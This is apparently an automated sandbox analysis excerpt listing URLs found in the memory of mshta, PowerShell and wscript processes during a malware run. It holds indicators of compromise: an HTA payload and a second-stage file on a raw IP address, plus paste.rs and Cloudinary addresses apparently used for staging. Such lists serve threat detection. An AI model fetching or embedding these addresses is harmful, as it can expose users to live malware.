            Source: mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/
            Source: mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
            Source: mshta.exe, 00000004.00000003.436007400.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.000000000046E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434003137.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki
            Source: mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asa
            Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/
            Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasa
            Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta2
            Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Q
            Source: mshta.exe, 00000012.00000003.491244632.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:
            Source: mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:
            Source: mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4K
            Source: mshta.exe, 00000004.00000003.436100458.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.490780364.0000000003115000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485500603.0000000003115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.23
            Source: mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4K
            Source: mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htat
            Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynice
            Source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
            Source: powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/
            Source: powershell.exe, 00000008.00000002.461003227.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.504255540.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:
            Source: powershell.exe, 00000008.00000002.457451586.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C32C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFl
            Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFp
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.0000000004738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.460637378.000000001A645000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 0000000F.00000002.520578292.0000000000426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.6
            Source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
            Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 00000008.00000002.457674292.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.521154149.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wscript.exe, 0000000E.00000002.469658400.00000000041DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.00000000046D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/
            Source: wscript.exe, 0000000E.00000003.466927563.000000000011F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467156668.0000000000145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467752807.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469167608.0000000000145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.466657074.00000000039E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467377292.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467610460.00000000000D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.466460293.0000000000140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509294834.0000000003A10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509060438.000000000041F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.506078670.0000000000440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509085589.0000000000445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509573074.0000000000445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/ACRWC
            Source: wscript.exe, 0000001A.00000002.509713850.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-1006
            Source: wscript.exe, 0000001A.00000003.509150838.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509409048.00000000003D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/ACRWCy
            Source: powershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
